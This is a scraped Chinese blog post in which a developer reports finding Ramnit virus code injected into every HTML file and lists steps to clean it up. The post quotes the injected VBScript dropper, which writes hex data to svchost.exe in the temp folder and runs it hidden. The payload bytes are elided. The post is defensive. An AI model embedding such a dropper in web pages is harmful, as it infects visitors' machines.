ramnit病毒
来源:互联网 发布:小分子肽是骗局吗 知乎 编辑:程序博客网 时间:2024/05/16 12:56
今天打开Hbuilder,发现每个html文档都有如下代码:
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData =4B3F9................................................................0FAB3F-------无数个十六进制字符
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileNameIf FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
网上搜索是电脑中的ramnit病毒
此类病毒是感染类病毒,要先断源,防止反复感染,然后清理查杀才有效
1.使用漏洞修复扫描,并安装所有的高危漏洞补丁
2.使用安全卫士--功能大全---系统防黑加固扫描,解决系统薄弱项,防止因为弱口令问题导致反复感染
3.如果有安装oracle,my SQL之类的数据库软件,请将登录口令设置在16位以上,要包含大小写,数字和特殊字符,理由同上
4.下载安装最新版的360杀毒,并在断网情况下进行下全盘扫描扫描完毕后重启,然后再次全盘扫描,即可解决问题
0 0
- ramnit病毒
- 关于感染型病毒ramnit和runner的查杀记事
- 病毒
- 病毒
- 病毒
- 病毒
- 病毒
- 病毒
- 病毒
- ???????病毒
- 病毒
- 病毒
- 病毒
- 病毒
- 病毒
- 病毒
- 病毒
- 病毒
- yii2 查询时使用中间表
- ListView 如何提高其效率
- The Linux Command Line 读书笔记 第十二章 A Gentle Introduction To vi
- 文件系统的无损压缩算法miniLZO
- 笔记26 Android中自定义属性的使用
- ramnit病毒
- C#--设计模式之装饰者模式
- android BSP
- 用python对minist数据集进行读取并保存成图片
- Android Studio 2.2新特性:新布局、Firebase、OpenJDK以及Java 8
- 华佳慧科技:OSN500设备ERPS相切环组网介绍
- 蓝鸥零基础学习HTML5第九讲 兼容性三
- 第4章类与对象-引用包中的类-判断是否为三角形并计算其面积
- 图解使用VS的安装项目打包程序